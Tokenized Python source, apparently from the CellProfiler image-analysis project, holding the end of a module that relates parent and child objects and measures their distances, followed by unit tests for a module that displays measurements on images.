centers_of_labels ( parents . segmented ) . transpose ( ) <EOL> ccenters = centers_of_labels ( children . segmented ) . transpose ( ) <EOL> if pcenters . shape [ <NUM_LIT:0> ] == <NUM_LIT:0> or ccenters . shape [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> dist = np . array ( [ np . NaN ] * len ( parents_of ) ) <EOL> else : <EOL> parents_of = parents_of - <NUM_LIT:1> <EOL> mask = ( parents_of != - <NUM_LIT:1> ) | ( parents_of > pcenters . shape [ <NUM_LIT:0> ] ) <EOL> dist = np . array ( [ np . NaN ] * ccenters . shape [ <NUM_LIT:0> ] ) <EOL> dist [ mask ] = np . sqrt ( np . sum ( ( ccenters [ mask , : ] - <EOL> pcenters [ parents_of [ mask ] , : ] ) ** <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> meas . add_measurement ( sub_object_name , FF_CENTROID % parent_name , dist ) <EOL> def calculate_minimum_distances ( self , workspace , parent_name ) : <EOL> '''<STR_LIT>''' <EOL> meas = workspace . measurements <EOL> assert isinstance ( meas , cpmeas . Measurements ) <EOL> sub_object_name = self . sub_object_name . value <EOL> parents = workspace . object_set . get_objects ( parent_name ) <EOL> children = workspace . object_set . get_objects ( sub_object_name ) <EOL> parents_of = self . get_parents_of ( workspace , parent_name ) <EOL> if len ( parents_of ) == <NUM_LIT:0> : <EOL> dist = np . zeros ( ( <NUM_LIT:0> , ) ) <EOL> elif np . all ( parents_of == <NUM_LIT:0> ) : <EOL> dist = np . array ( [ np . NaN ] * len ( parents_of ) ) <EOL> else : <EOL> mask = parents_of > <NUM_LIT:0> <EOL> ccenters = centers_of_labels ( children . segmented ) . transpose ( ) <EOL> ccenters = ccenters [ mask , : ] <EOL> parents_of_masked = parents_of [ mask ] - <NUM_LIT:1> <EOL> pperim = outline ( parents . segmented ) <EOL> perim_loc = np . argwhere ( pperim != <NUM_LIT:0> ) <EOL> perim_idx = pperim [ perim_loc [ : , <NUM_LIT:0> ] , perim_loc [ : , <NUM_LIT:1> ] ] <EOL> idx = np . lexsort ( ( perim_loc [ : , <NUM_LIT:1> ] , perim_loc [ : , <NUM_LIT:0> ] , perim_idx ) ) <EOL> perim_loc = perim_loc [ idx , : ] <EOL> perim_idx = perim_idx [ idx ] <EOL> counts = fix ( scind . sum ( np . ones ( len ( perim_idx ) ) , perim_idx , <EOL> np . arange ( <NUM_LIT:1> , perim_idx [ - <NUM_LIT:1> ] + <NUM_LIT:1> ) ) ) . astype ( np . int32 ) <EOL> indexes = np . cumsum ( counts ) - counts <EOL> ccounts = counts [ parents_of_masked ] <EOL> cindexes = indexes [ parents_of_masked ] <EOL> clabel = np . zeros ( np . sum ( ccounts ) , int ) <EOL> cfirst = np . cumsum ( ccounts ) - ccounts <EOL> clabel [ cfirst [ <NUM_LIT:1> : ] ] += <NUM_LIT:1> <EOL> clabel = np . cumsum ( clabel ) <EOL> cp_index = np . arange ( len ( clabel ) ) - cfirst [ clabel ] <EOL> cp_index += cindexes [ clabel ] <EOL> dist = np . sqrt ( np . sum ( ( perim_loc [ cp_index , : ] - <EOL> ccenters [ clabel , : ] ) ** <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> min_dist = fix ( scind . minimum ( dist , clabel , np . arange ( len ( ccounts ) ) ) ) <EOL> dist = np . array ( [ np . NaN ] * len ( mask ) ) <EOL> dist [ mask ] = min_dist <EOL> meas . add_measurement ( sub_object_name , FF_MINIMUM % parent_name , dist ) <EOL> def get_parents_of ( self , workspace , parent_name ) : <EOL> '''<STR_LIT>''' <EOL> meas = workspace . measurements <EOL> assert isinstance ( meas , cpmeas . Measurements ) <EOL> parent_feature = FF_PARENT % parent_name <EOL> primary_parent = self . parent_name . value <EOL> sub_object_name = self . sub_object_name . value <EOL> primary_parent_feature = FF_PARENT % primary_parent <EOL> if parent_feature in meas . get_feature_names ( sub_object_name ) : <EOL> parents_of = meas . get_current_measurement ( sub_object_name , <EOL> parent_feature ) <EOL> elif parent_feature in meas . get_feature_names ( primary_parent ) : <EOL> primary_parents_of = meas . get_current_measurement ( <EOL> sub_object_name , primary_parent_feature ) <EOL> grandparents_of = meas . get_current_measurement ( primary_parent , <EOL> parent_feature ) <EOL> mask = primary_parents_of != <NUM_LIT:0> <EOL> parents_of = np . zeros ( primary_parents_of . shape [ <NUM_LIT:0> ] , <EOL> grandparents_of . dtype ) <EOL> if primary_parents_of . shape [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> parents_of [ mask ] = grandparents_of [ primary_parents_of [ mask ] - <NUM_LIT:1> ] <EOL> elif primary_parent_feature in meas . get_feature_names ( parent_name ) : <EOL> primary_parents_of = meas . get_current_measurement ( <EOL> sub_object_name , primary_parent_feature ) <EOL> primary_parents_of_parent = meas . get_current_measurement ( <EOL> parent_name , primary_parent_feature ) <EOL> reverse_lookup_len = max ( np . max ( primary_parents_of ) + <NUM_LIT:1> , <EOL> len ( primary_parents_of_parent ) ) <EOL> reverse_lookup = np . zeros ( reverse_lookup_len , int ) <EOL> if primary_parents_of_parent . shape [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> reverse_lookup [ primary_parents_of_parent ] = np . arange ( <NUM_LIT:1> , len ( primary_parents_of_parent ) + <NUM_LIT:1> ) <EOL> if primary_parents_of . shape [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> parents_of = reverse_lookup [ primary_parents_of ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( primary_parent , parent_name ) ) <EOL> return parents_of <EOL> ignore_features = set ( M_NUMBER_OBJECT_NUMBER ) <EOL> def should_aggregate_feature ( self , feature_name ) : <EOL> '''<STR_LIT>''' <EOL> if feature_name . startswith ( C_MEAN ) : <EOL> return False <EOL> if feature_name . startswith ( C_PARENT ) : <EOL> return False <EOL> if feature_name in self . ignore_features : <EOL> return False <EOL> return True <EOL> def validate_module ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> for module in pipeline . modules ( ) : <EOL> if module == self : <EOL> break <EOL> parent_features = module . get_measurements ( <EOL> pipeline , self . sub_object_name . value , "<STR_LIT>" ) <EOL> if self . parent_name . value in parent_features : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" % <EOL> ( self . sub_object_name . value , self . parent_name . value , <EOL> module . module_name ) , self . parent_name ) <EOL> if self . has_step_parents and self . wants_step_parent_distances : <EOL> step_parents = set ( ) <EOL> for group in self . step_parent_names : <EOL> if group . step_parent_name . value in step_parents : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" % <EOL> group . step_parent_name . value , <EOL> group . step_parent_name ) <EOL> step_parents . add ( group . step_parent_name . value ) <EOL> def get_child_columns ( self , pipeline ) : <EOL> child_columns = pipeline . get_measurement_columns ( self ) <EOL> child_columns = [ column <EOL> for column in child_columns <EOL> if column [ <NUM_LIT:0> ] == self . sub_object_name . value and <EOL> self . should_aggregate_feature ( column [ <NUM_LIT:1> ] ) ] + self . get_child_measurement_columns ( pipeline ) <EOL> return child_columns <EOL> def get_child_measurement_columns ( self , pipeline ) : <EOL> columns = [ ] <EOL> if self . find_parent_child_distances in ( D_BOTH , D_CENTROID ) : <EOL> for parent_name in self . get_parent_names ( ) : <EOL> columns += [ ( self . sub_object_name . value , <EOL> FF_CENTROID % parent_name , <EOL> cpmeas . COLTYPE_INTEGER ) ] <EOL> if self . find_parent_child_distances in ( D_BOTH , D_MINIMUM ) : <EOL> for parent_name in self . get_parent_names ( ) : <EOL> columns += [ ( self . sub_object_name . value , <EOL> FF_MINIMUM % parent_name , <EOL> cpmeas . COLTYPE_INTEGER ) ] <EOL> return columns <EOL> def get_measurement_columns ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> columns = [ ( self . sub_object_name . value , <EOL> FF_PARENT % self . parent_name . value , <EOL> cpmeas . COLTYPE_INTEGER ) , <EOL> ( self . parent_name . value , <EOL> FF_CHILDREN_COUNT % self . sub_object_name . value , <EOL> cpmeas . COLTYPE_INTEGER ) ] <EOL> if self . wants_per_parent_means . value : <EOL> child_columns = self . get_child_columns ( pipeline ) <EOL> columns += [ ( self . parent_name . value , <EOL> FF_MEAN % ( self . sub_object_name . value , column [ <NUM_LIT:1> ] ) , <EOL> cpmeas . COLTYPE_FLOAT ) <EOL> for column in child_columns ] <EOL> columns += self . get_child_measurement_columns ( pipeline ) <EOL> return columns <EOL> def get_object_relationships ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> parent_name = self . parent_name . value <EOL> sub_object_name = self . sub_object_name . value <EOL> return [ ( R_PARENT , parent_name , sub_object_name , <EOL> cpmeas . MCA_AVAILABLE_EACH_CYCLE ) , <EOL> ( R_CHILD , sub_object_name , parent_name , <EOL> cpmeas . MCA_AVAILABLE_EACH_CYCLE ) ] <EOL> def get_categories ( self , pipeline , object_name ) : <EOL> if object_name == self . parent_name . value : <EOL> if self . wants_per_parent_means : <EOL> return [ "<STR_LIT>" % self . sub_object_name , "<STR_LIT>" ] <EOL> else : <EOL> return [ "<STR_LIT>" ] <EOL> elif object_name == self . sub_object_name . value : <EOL> result = [ "<STR_LIT>" ] <EOL> if self . find_parent_child_distances != D_NONE : <EOL> result += [ C_DISTANCE ] <EOL> return result <EOL> return [ ] <EOL> def get_measurements ( self , pipeline , object_name , category ) : <EOL> if object_name == self . parent_name . value : <EOL> if category == "<STR_LIT>" % self . sub_object_name . value : <EOL> measurements = [ ] <EOL> child_columns = self . get_child_columns ( pipeline ) <EOL> measurements += [ column [ <NUM_LIT:1> ] for column in child_columns ] <EOL> return measurements <EOL> elif category == "<STR_LIT>" : <EOL> return [ "<STR_LIT>" % self . sub_object_name . value ] <EOL> elif object_name == self . sub_object_name . value and category == "<STR_LIT>" : <EOL> return [ self . parent_name . value ] <EOL> elif ( object_name == self . sub_object_name . value and <EOL> category == C_DISTANCE ) : <EOL> result = [ ] <EOL> if self . find_parent_child_distances in ( D_BOTH , D_CENTROID ) : <EOL> result += [ '<STR_LIT>' % ( FEAT_CENTROID , parent_name ) <EOL> for parent_name in self . get_parent_names ( ) ] <EOL> if self . find_parent_child_distances in ( D_BOTH , D_MINIMUM ) : <EOL> result += [ '<STR_LIT>' % ( FEAT_MINIMUM , parent_name ) <EOL> for parent_name in self . get_parent_names ( ) ] <EOL> return result <EOL> return [ ] <EOL> def prepare_settings ( self , setting_values ) : <EOL> """<STR_LIT>""" <EOL> setting_count = len ( setting_values ) <EOL> step_parent_count = ( ( setting_count - FIXED_SETTING_COUNT ) / <EOL> VARIABLE_SETTING_COUNT ) <EOL> assert len ( self . step_parent_names ) > <NUM_LIT:0> <EOL> self . step_parent_names = self . step_parent_names [ : <NUM_LIT:1> ] <EOL> for i in range ( <NUM_LIT:1> , step_parent_count ) : <EOL> self . add_step_parent ( ) <EOL> def upgrade_settings ( self , setting_values , variable_revision_number , module_name , from_matlab ) : <EOL> if from_matlab and variable_revision_number == <NUM_LIT:2> : <EOL> setting_values = [ setting_values [ <NUM_LIT:0> ] , <EOL> setting_values [ <NUM_LIT:1> ] , <EOL> setting_values [ <NUM_LIT:2> ] , <EOL> cps . DO_NOT_USE , <EOL> cps . YES ] <EOL> variable_revision_number = <NUM_LIT:3> <EOL> if from_matlab and variable_revision_number == <NUM_LIT:3> : <EOL> setting_values = list ( setting_values ) <EOL> setting_values [ <NUM_LIT:2> ] = ( D_MINIMUM if setting_values [ <NUM_LIT:2> ] == cps . YES <EOL> else D_NONE ) <EOL> variable_revision_number = <NUM_LIT:4> <EOL> if from_matlab and variable_revision_number == <NUM_LIT:4> : <EOL> if setting_values [ <NUM_LIT:2> ] == cps . DO_NOT_USE : <EOL> setting_values = ( setting_values [ : <NUM_LIT:2> ] + [ D_NONE ] + <EOL> setting_values [ <NUM_LIT:3> : ] ) <EOL> from_matlab = False <EOL> variable_revision_number = <NUM_LIT:1> <EOL> if ( not from_matlab ) and variable_revision_number == <NUM_LIT:1> : <EOL> if setting_values [ <NUM_LIT:2> ] == cps . DO_NOT_USE : <EOL> find_parent_distances = D_NONE <EOL> else : <EOL> find_parent_distances = setting_values [ <NUM_LIT:2> ] <EOL> wants_step_parent_distances = ( <EOL> cps . NO if setting_values [ <NUM_LIT:3> ] . upper ( ) == cps . DO_NOT_USE . upper ( ) <EOL> else cps . YES ) <EOL> setting_values = ( setting_values [ : <NUM_LIT:2> ] + <EOL> [ find_parent_distances , <EOL> setting_values [ <NUM_LIT:4> ] , <EOL> wants_step_parent_distances , <EOL> setting_values [ <NUM_LIT:3> ] ] ) <EOL> variable_revision_number = <NUM_LIT:2> <EOL> return setting_values , variable_revision_number , from_matlab <EOL> Relate = RelateObjects </s>
<s> '''<STR_LIT>''' <EOL> import base64 <EOL> import unittest <EOL> import zlib <EOL> from StringIO import StringIO <EOL> import numpy as np <EOL> from cellprofiler . preferences import set_headless <EOL> set_headless ( ) <EOL> import cellprofiler . workspace as cpw <EOL> import cellprofiler . cpgridinfo as cpg <EOL> import cellprofiler . cpimage as cpi <EOL> import cellprofiler . cpmodule as cpm <EOL> import cellprofiler . objects as cpo <EOL> import cellprofiler . measurements as cpmeas <EOL> import cellprofiler . pipeline as cpp <EOL> import cellprofiler . modules . displaydataonimage as D <EOL> from centrosome . cpmorphology import centers_of_labels <EOL> INPUT_IMAGE_NAME = '<STR_LIT>' <EOL> OUTPUT_IMAGE_NAME = '<STR_LIT>' <EOL> OBJECTS_NAME = '<STR_LIT>' <EOL> MEASUREMENT_NAME = '<STR_LIT>' <EOL> class TestDisplayDataOnImage ( unittest . TestCase ) : <EOL> def test_01_00_load_matlab ( self ) : <EOL> data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( StringIO ( zlib . decompress ( base64 . b64decode ( data ) ) ) ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:3> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertTrue ( isinstance ( module , D . DisplayDataOnImage ) ) <EOL> self . assertEqual ( module . image_name , "<STR_LIT>" ) <EOL> self . assertEqual ( module . text_color , "<STR_LIT>" ) <EOL> self . assertEqual ( module . objects_or_image , D . OI_IMAGE ) <EOL> self . assertEqual ( module . display_image , "<STR_LIT>" ) <EOL> self . assertEqual ( module . saved_image_contents , "<STR_LIT>" ) <EOL> def test_01_01_load_v1 ( self ) : <EOL> data = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( StringIO ( zlib . decompress ( base64 . b64decode ( data ) ) ) ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:3> ) <EOL> module = pipeline . modules ( ) [ - <NUM_LIT:1> ] <EOL> self . assertTrue ( isinstance ( module , D . DisplayDataOnImage ) ) <EOL> self . assertEqual ( module . objects_or_image , D . OI_OBJECTS ) <EOL> self . assertEqual ( module . objects_name , "<STR_LIT>" ) <EOL> self . assertEqual ( module . measurement , "<STR_LIT>" ) <EOL> self . assertEqual ( module . image_name , "<STR_LIT>" ) <EOL> self . assertEqual ( module . text_color , "<STR_LIT>" ) <EOL> self . assertEqual ( module . display_image , "<STR_LIT>" ) <EOL> self . assertEqual ( module . saved_image_contents , "<STR_LIT>" ) <EOL> def test_01_04_load_v4 ( self ) : <EOL> data = r"""<STR_LIT>""" <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( StringIO ( data ) ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:1> ) <EOL> module = pipeline . modules ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( isinstance ( module , D . DisplayDataOnImage ) ) <EOL> self . assertEqual ( module . objects_or_image , D . OI_OBJECTS ) <EOL> self . assertEqual ( module . measurement , "<STR_LIT>" ) <EOL> self . assertEqual ( module . image_name , "<STR_LIT>" ) <EOL> self . assertEqual ( module . text_color , "<STR_LIT>" ) <EOL> self . assertEqual ( module . objects_name , "<STR_LIT>" ) <EOL> self . assertEqual ( module . display_image , "<STR_LIT>" ) <EOL> self . assertEqual ( module . font_size , <NUM_LIT:10> ) <EOL> self . assertEqual ( module . decimals , <NUM_LIT:2> ) <EOL> self . assertEqual ( module . saved_image_contents , D . E_AXES ) <EOL> self . assertEqual ( module . offset , <NUM_LIT:5> ) <EOL> self . assertEqual ( module . color_or_text , D . CT_COLOR ) <EOL> self . assertEqual ( module . colormap , "<STR_LIT>" ) <EOL> self . assertTrue ( module . wants_image ) <EOL> def test_01_04_load_v5 ( self ) : <EOL> data = r"""<STR_LIT>""" <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( StringIO ( data ) ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:1> ) <EOL> module = pipeline . modules ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( isinstance ( module , D . DisplayDataOnImage ) ) <EOL> self . assertEqual ( module . objects_or_image , D . OI_OBJECTS ) <EOL> self . assertEqual ( module . measurement , "<STR_LIT>" ) <EOL> self . assertEqual ( module . image_name , "<STR_LIT>" ) <EOL> self . assertEqual ( module . text_color , "<STR_LIT>" ) <EOL> self . assertEqual ( module . objects_name , "<STR_LIT>" ) <EOL> self . assertEqual ( module . display_image , "<STR_LIT>" ) <EOL> self . assertEqual ( module . font_size , <NUM_LIT:10> ) <EOL> self . assertEqual ( module . decimals , <NUM_LIT:2> ) <EOL> self . assertEqual ( module . saved_image_contents , D . E_AXES ) <EOL> self . assertEqual ( module . offset , <NUM_LIT:5> ) <EOL> self . assertEqual ( module . color_or_text , D . CT_COLOR ) <EOL> self . assertEqual ( module . colormap , "<STR_LIT>" ) <EOL> self . assertFalse ( module . wants_image ) <EOL> self . assertEqual ( module . color_map_scale_choice , <EOL> D . CMS_USE_MEASUREMENT_RANGE ) <EOL> self . assertEqual ( module . color_map_scale . min , <NUM_LIT:0> ) <EOL> self . assertEqual ( module . color_map_scale . max , <NUM_LIT:1> ) <EOL> def test_01_06_load_v6 ( self ) : <EOL> data = r"""<STR_LIT>""" <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . LoadExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . load ( StringIO ( data ) ) <EOL> self . assertEqual ( len ( pipeline . modules ( ) ) , <NUM_LIT:2> ) <EOL> module = pipeline . modules ( ) [ <NUM_LIT:0> ] <EOL> self . assertTrue ( isinstance ( module , D . DisplayDataOnImage ) ) <EOL> self . assertEqual ( module . objects_or_image , D . OI_OBJECTS ) <EOL> self . assertEqual ( module . objects_name , "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> module . measurement , "<STR_LIT>" ) <EOL> self . assertEqual ( module . image_name , "<STR_LIT>" ) <EOL> self . assertEqual ( module . display_image , "<STR_LIT>" ) <EOL> self . assertEqual ( module . font_size , <NUM_LIT:11> ) <EOL> self . assertEqual ( module . decimals , <NUM_LIT:3> ) <EOL> self . assertEqual ( module . saved_image_contents , D . E_IMAGE ) <EOL> self . assertEqual ( module . offset , <NUM_LIT:1> ) <EOL> self . assertEqual ( module . color_or_text , D . CT_COLOR ) <EOL> self . assertEqual ( module . colormap , "<STR_LIT>" ) <EOL> self . assertTrue ( module . wants_image ) <EOL> self . assertEqual ( module . color_map_scale_choice , <EOL> D . CMS_MANUAL ) <EOL> self . assertEqual ( module . color_map_scale . min , <NUM_LIT> ) <EOL> self . assertEqual ( module . color_map_scale . max , <NUM_LIT> ) <EOL> module = pipeline . modules ( ) [ <NUM_LIT:1> ] <EOL> self . assertEqual ( module . color_map_scale_choice , <EOL> D . CMS_USE_MEASUREMENT_RANGE ) <EOL> def make_workspace ( self , measurement , labels = None , image = None ) : <EOL> object_set = cpo . ObjectSet ( ) <EOL> module = D . DisplayDataOnImage ( ) <EOL> module . module_num = <NUM_LIT:1> <EOL> module . image_name . value = INPUT_IMAGE_NAME <EOL> module . display_image . value = OUTPUT_IMAGE_NAME <EOL> module . objects_name . value = OBJECTS_NAME <EOL> m = cpmeas . Measurements ( ) <EOL> if labels is None : <EOL> module . objects_or_image . value = D . OI_IMAGE <EOL> m . add_image_measurement ( MEASUREMENT_NAME , measurement ) <EOL> if image is None : <EOL> image = np . zeros ( ( <NUM_LIT:50> , <NUM_LIT> ) ) <EOL> else : <EOL> module . objects_or_image . value = D . OI_OBJECTS <EOL> o = cpo . Objects ( ) <EOL> o . segmented = labels <EOL> object_set . add_objects ( o , OBJECTS_NAME ) <EOL> m . add_measurement ( OBJECTS_NAME , MEASUREMENT_NAME , np . array ( measurement ) ) <EOL> y , x = centers_of_labels ( labels ) <EOL> m . add_measurement ( OBJECTS_NAME , "<STR_LIT>" , x ) <EOL> m . add_measurement ( OBJECTS_NAME , "<STR_LIT>" , y ) <EOL> if image is None : <EOL> image = np . zeros ( labels . shape ) <EOL> module . measurement . value = MEASUREMENT_NAME <EOL> pipeline = cpp . Pipeline ( ) <EOL> def callback ( caller , event ) : <EOL> self . assertFalse ( isinstance ( event , cpp . RunExceptionEvent ) ) <EOL> pipeline . add_listener ( callback ) <EOL> pipeline . add_module ( module ) <EOL> image_set_list = cpi . ImageSetList ( ) <EOL> image_set = image_set_list . get_image_set ( <NUM_LIT:0> ) <EOL> image_set . add ( INPUT_IMAGE_NAME , cpi . Image ( image ) ) <EOL> workspace = cpw . Workspace ( pipeline , module , image_set , object_set , <EOL> m , image_set_list ) <EOL> return workspace , module <EOL> def test_02_01_display_image ( self ) : <EOL> for display in ( D . E_AXES , D . E_FIGURE , D . E_IMAGE ) : <EOL> workspace , module = self . make_workspace ( <NUM_LIT:0> ) <EOL> module . saved_image_contents . value = display <EOL> module . run ( workspace ) <EOL> image = workspace . image_set . get_image ( OUTPUT_IMAGE_NAME ) <EOL> def test_02_02_display_objects ( self ) : <EOL> labels = np . zeros ( ( <NUM_LIT:50> , <NUM_LIT> ) , int ) <EOL> labels [ <NUM_LIT:10> : <NUM_LIT:20> , <NUM_LIT:20> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:30> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:50> ] = <NUM_LIT:2> <EOL> labels [ <NUM_LIT:5> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:100> ] = <NUM_LIT:3> <EOL> for display in ( D . E_AXES , D . E_FIGURE , D . E_IMAGE ) : <EOL> workspace , module = self . make_workspace ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , labels ) <EOL> module . saved_image_contents . value = display <EOL> module . run ( workspace ) <EOL> image = workspace . image_set . get_image ( OUTPUT_IMAGE_NAME ) <EOL> def test_02_03_display_no_objects ( self ) : <EOL> workspace , module = self . make_workspace ( [ ] , np . zeros ( ( <NUM_LIT:50> , <NUM_LIT> ) ) ) <EOL> module . run ( workspace ) <EOL> image = workspace . image_set . get_image ( OUTPUT_IMAGE_NAME ) <EOL> def test_02_04_display_nan_objects ( self ) : <EOL> labels = np . zeros ( ( <NUM_LIT:50> , <NUM_LIT> ) , int ) <EOL> labels [ <NUM_LIT:10> : <NUM_LIT:20> , <NUM_LIT:20> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:30> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:50> ] = <NUM_LIT:2> <EOL> labels [ <NUM_LIT:5> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:100> ] = <NUM_LIT:3> <EOL> for measurements in ( np . array ( [ <NUM_LIT:1.0> , np . nan , <NUM_LIT> ] ) , np . array ( [ np . nan ] * <NUM_LIT:3> ) ) : <EOL> workspace , module = self . make_workspace ( measurements , labels ) <EOL> module . run ( workspace ) <EOL> image = workspace . image_set . get_image ( OUTPUT_IMAGE_NAME ) <EOL> def test_02_05_display_objects_wrong_size ( self ) : <EOL> labels = np . zeros ( ( <NUM_LIT:50> , <NUM_LIT> ) , int ) <EOL> labels [ <NUM_LIT:10> : <NUM_LIT:20> , <NUM_LIT:20> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:30> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:50> ] = <NUM_LIT:2> <EOL> labels [ <NUM_LIT:5> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:100> ] = <NUM_LIT:3> <EOL> input_image = np . random . uniform ( size = ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> for display in ( D . E_AXES , D . E_FIGURE , D . E_IMAGE ) : <EOL> workspace , module = self . make_workspace ( [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , labels , input_image ) <EOL> module . saved_image_contents . value = display <EOL> module . run ( workspace ) <EOL> image = workspace . image_set . get_image ( OUTPUT_IMAGE_NAME ) <EOL> def test_02_06_display_colors ( self ) : <EOL> labels = np . zeros ( ( <NUM_LIT:50> , <NUM_LIT> ) , int ) <EOL> labels [ <NUM_LIT:10> : <NUM_LIT:20> , <NUM_LIT:20> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:30> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:50> ] = <NUM_LIT:2> <EOL> labels [ <NUM_LIT:5> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:100> ] = <NUM_LIT:3> <EOL> workspace , module = self . make_workspace ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , labels ) <EOL> assert isinstance ( module , D . DisplayDataOnImage ) <EOL> module . color_or_text . value = D . CT_COLOR <EOL> module . run ( workspace ) <EOL> image = workspace . image_set . get_image ( OUTPUT_IMAGE_NAME ) <EOL> def test_02_07_display_colors_missing_measurement ( self ) : <EOL> labels = np . zeros ( ( <NUM_LIT:50> , <NUM_LIT> ) , int ) <EOL> labels [ <NUM_LIT:10> : <NUM_LIT:20> , <NUM_LIT:20> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:30> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:50> ] = <NUM_LIT:2> <EOL> labels [ <NUM_LIT:5> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:100> ] = <NUM_LIT:3> <EOL> workspace , module = self . make_workspace ( [ <NUM_LIT> , <NUM_LIT> ] , labels ) <EOL> assert isinstance ( module , D . DisplayDataOnImage ) <EOL> module . color_or_text . value = D . CT_COLOR <EOL> module . run ( workspace ) <EOL> image = workspace . image_set . get_image ( OUTPUT_IMAGE_NAME ) <EOL> def test_02_08_display_colors_nan_measurement ( self ) : <EOL> labels = np . zeros ( ( <NUM_LIT:50> , <NUM_LIT> ) , int ) <EOL> labels [ <NUM_LIT:10> : <NUM_LIT:20> , <NUM_LIT:20> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:30> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:50> ] = <NUM_LIT:2> <EOL> labels [ <NUM_LIT:5> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:100> ] = <NUM_LIT:3> <EOL> workspace , module = self . make_workspace ( [ <NUM_LIT> , np . nan , <NUM_LIT> ] , labels ) <EOL> assert isinstance ( module , D . DisplayDataOnImage ) <EOL> module . color_or_text . value = D . CT_COLOR <EOL> module . run ( workspace ) <EOL> image = workspace . image_set . get_image ( OUTPUT_IMAGE_NAME ) <EOL> def test_02_09_display_colors_manual ( self ) : <EOL> labels = np . zeros ( ( <NUM_LIT:50> , <NUM_LIT> ) , int ) <EOL> labels [ <NUM_LIT:10> : <NUM_LIT:20> , <NUM_LIT:20> : <NUM_LIT> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:30> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:50> ] = <NUM_LIT:2> <EOL> labels [ <NUM_LIT:5> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:100> ] = <NUM_LIT:3> <EOL> workspace , module = self . make_workspace ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] 